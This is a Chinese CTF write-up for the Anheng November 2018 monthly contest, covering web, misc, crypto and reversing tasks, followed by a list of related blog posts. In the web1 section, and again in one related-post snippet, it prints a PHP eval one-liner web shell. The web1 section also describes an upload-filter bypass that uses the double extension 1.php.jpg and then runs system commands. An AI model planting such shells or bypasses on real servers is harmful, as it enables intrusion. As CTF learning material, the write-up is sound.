CTF-安恒18年十一月月赛部分writeup
安恒十一月月赛writeup
昨天做了一下十一月的题目,不才只做出来几道
签到web1
这个是十月的原题,因为忘了截图所以只能提供思路
Web消息头包含了登陆框的密码
输入密码后进入上传页面,上传一句话木马1.jpg,
<?php @eval($_POST['cmd']);?>
使用burp将上传文件名改为1.php.jpg
然后post数据发现已经getshell
Flag就在上一层目录里所以post数据:system(‘dir ../’);
得出flag为:flag{698539765730b69026796420b9201e03}
具体可以参考:https://www.jianshu.com/p/e1af7cc3483d
MISC1-Numeric password
题目:
解题过程:
起初并不知道这是啥,然后百度了一下下面的名词,发现
有点意思,然后进去看看,发现了对应关系,
然后一个一个找出来,其中21世纪就是21,是在其他数字记忆表找到的,72-企鹅……
72 78 67 73 93 67 25 20 69 20 20 70 69 68 67 70 24 21 27 67 27 20 25 27 21 72 26 20 18 20 70 70 67 70 72 23 20 95
然后试着去换成ASCII码看看,发现
出现了不可显的ASCII码,那flag肯定不是这个,既然数字已经给定了,编码最有可能是凯撒移位
Payload:
写个脚本爆破一下
exp =[72,78,67,73,93,67,25,20,69,20,20,70,69,68,67,70,24,21,27,67,27,20,25,27,21,72,26,20,18,20,70,70,67,70,72,23,20,95] flag="" for i in range(1,127):
for j in exp:
flag+=chr(j+i)
print(flag)
flag=""
flag为:flag{a72c22dcbad639a92793f8202ddadf52}
MISC2-我的公子在何方
题目:
解题过程:
压缩包是加密的,打开password,直接输入提示错误。
Base64解一下
读一下txt内容
他有提示说:其载体图像是24位的BMP格式图像
百度一下:载体图像是24位的BMP格式图像隐写工具
下载这个工具
尝试打开图片发现需要密码
然后txt提示:并且密码是与图片主人公演绎的剧中相关的人物
百度搜图
天仙配…其实我根本不知道相关人物是谁,然后百度一下演员表一个一个试吧
发现dongyong就是密码,
到网站http://tool.oschina.net/encrypt解密,一时看不出这是什么加密,那就一个一个试,
什么也没,那应该还是加密了…
密码也不知道是什么,看了题解才知道是dongyong…
Payload:
所以flag为flag{97db6057a9a113c3e0a2bfb188a92698}
CRYPTO2-仿射
题目:
解题过程:
题目已经很明了了,是仿射密码,所以到网站http://ctf.ssleye.com/affine.html
解一下,已经提示了b=7那这就好办了,直接爆破a就行
网站也提示了a的取值
在a=9的时候出现了flag
题目要求提交md5所以
Payload:
flag为:flag{e8cb7b46bcf72d62e74100dd19bc63c6}
REVERSE2-Generate
题目:
题目要求输入一个数字然后给出flag
解题过程:
到ida看一下程序的逻辑
程序刚开始有一个Getinput,跟进看一下
提示输入信息,输入到DstBuf,输入的数是16字节然后转换为整数,然后传到int型中
无符号整数v11进入循环,循环32次
V8初始值为0,然后与v11异或,再和异或
疑惑的条件即是判断v7的范围是否在@以上Z以下,且不等于”_”,”{“,” }” ,如果不满足条件提示错误退出,意思就是结果是有范围的,结果在A-Z 和{ } _
接下来的操作是
最后的结果会赋给byte_408040
并且v8会和bayt_404024再次异或,byte_404020为字节
最后每次循环结束都把v11向后移一字节,然后继续进入循环
然后循环完毕后用start函数检测一下结果的开头
Start为
Exp
使用Z3约束解决
X=3658134498
Flag为flag: FLAG{___ZZLOZEZ_Z__AAPHTZIZ____}
原创文章,转载请标明出处 :https://www.cnblogs.com/pureqh
CTF-安恒18年十一月月赛部分writeup的更多相关文章
- CTF-安恒18年十二月月赛部分writeup
CTF-安恒十二月月赛部分writeup 这次题目都比较简单蛤,连我这菜鸡都能做几道. WEB1-ezweb2 打开网站,啥也没有,审计源代码,还是啥都没有,也没什么功能菜单,扫了一下目录,扫到了ad ...
- CTF-安恒19年二月月赛部分writeup
CTF-安恒19年二月月赛部分writeup MISC1-来玩个游戏吧 题目: 第一关,一眼可以看出是盲文,之前做过类似题目 拿到在线网站解一下 ??41402abc4b2a76b9719d91101 ...
- CTF-安恒19年一月月赛部分writeup
CTF-安恒19年一月月赛部分writeup MISC1-赢战2019 是一道图片隐写题 linux下可以正常打开图片,首先到binwalk分析一下. 里面有东西,foremost分离一下 有一张二维 ...
- 【CTF】2019湖湘杯 miscmisc writeup
题目来源:2019湖湘杯 题目链接:https://adworld.xctf.org.cn/task/answer?type=misc&number=1&grade=1&id= ...
- 安恒杯2月月赛-应该不是xss
1. 打开题目一看,是个留言板 2. 查看源码发现有几个js文件 依次打开发现在main.js里存在这样一段代码 3. 访问 /#login是登录的界面,/#chgpass是修改密码的界面,其中修改密 ...
- 安恒杯11月月赛web题目-ezsql详细记录
通过此题目可以学习到 1.通过load_file+like来盲注获取文件内容 2.php魔术方法__get函数的用法 3.bypass linux命令过滤 题目中给了注册和登录的功能,没有源码泄露 ...
- 2018安恒杯11月月赛 MISC
题目放评论了 Numeric password 这次隐写没有按照套路出牌,很强. 记录一下 看来自主学习的能力很有待提高. 打开Numeric password.txt 中华文化博大精深,近日在教小外 ...
- 安恒2018年三月月赛MISC蜘蛛侠呀
到处都是知识盲区hhh 下载了out.pcap之后,里面有很多ICMP包 看到ttl之后联想到西湖论剑里面的一道杂项题,无果 看WP知道可以使用wireshark的tshark命令提取流量包里面的文件 ...
- 【CTF】CTFHub 技能树 文件头检查 writeup
PHP一句话木马 <?php @eval($_POST["pass"]);?> <?php eval($_REQUEST["pass"]);? ...
随机推荐
- idea 断点调试
一.步骤控制 二.查看变量 IDEA debug查看变量值有3种方法: 1.鼠标悬浮 2.alt+f8快捷键(选中变量表达式,比如匿名变量或方法参数,再按atl+f8,接着回车) 3.debug窗口查 ...
- oracle 删除表的几种方法及回收站
1.删除表结构和表数据 drop table 表名 [purge] purge表示不放入回收站 2.删除表数据 delete from 表名 [where ...] 特点:高水位线不降:记录日志,速 ...
- zabbix使用问题
1中文乱码 https://www.linuxidc.com/Linux/2017-08/146162.htm 软件 说明 备注 zabbix 3.4.7 操作系统 Centos7 问题描述:图表内容 ...
- 如何让你的Ssh连接,更加安全?
希望你会涨姿势. First: vim /etc/ssh/sshd_config 在Port 22下面加一行,以端口1438为例,Port 1438 然后保存,重启ssh服务 systemctl re ...
- Jmeter入门--安装教程
jmeter简介 Apache JMeter是Apache组织开发的基于Java的压力测试工具.用于对软件做压力测试,它最初被设计用于Web应用测试,但后来扩展到其他测试领域. 它可以用于测试静态和动 ...
- C语言占位符
占位符就是先占住一个固定的位置,等着你再往里面添加内容的符号,广泛用于计算机中各类文档的编辑. 格式占位符(%)是在C/C++语言中格式输入函数,如 scanf.printf 等函数中使用.其意义就是 ...
- MySQL Bug导致异常宕机的分析流程
原文链接:http://click.aliyun.com/m/42521/ 摘要: 本文主要通过一个bug来记录一下如何分析一个MySQL bug的崩溃信息. 版本:Percona 5.7.17-11 ...
- python 基础-----数字,字符串,if while 循环 数据类型的转换简单介绍
一.第一个python小程序 首先我们要知道python创立的初衷是:Python崇尚优美.清晰.简单. 所以python比起其他的语言需要的工作量少了一半都不止,比如和现在一直霸占语言排行榜 榜首 ...
- [翻译] TCBlobDownload
TCBlobDownload TCBlobDownload uses NSOperations to download large files (typically videos, music... ...
- 清除 Exchange 2013/2016/2019 日志和ETL文件
Exchange Server 的2个日志目录会增长的很快,需要定时清理,不然C盘的空间很快就会吃光,以下这个powershell脚本就是用于清理目录下面的日志的,已在生产环境中测试过,没问题: S ...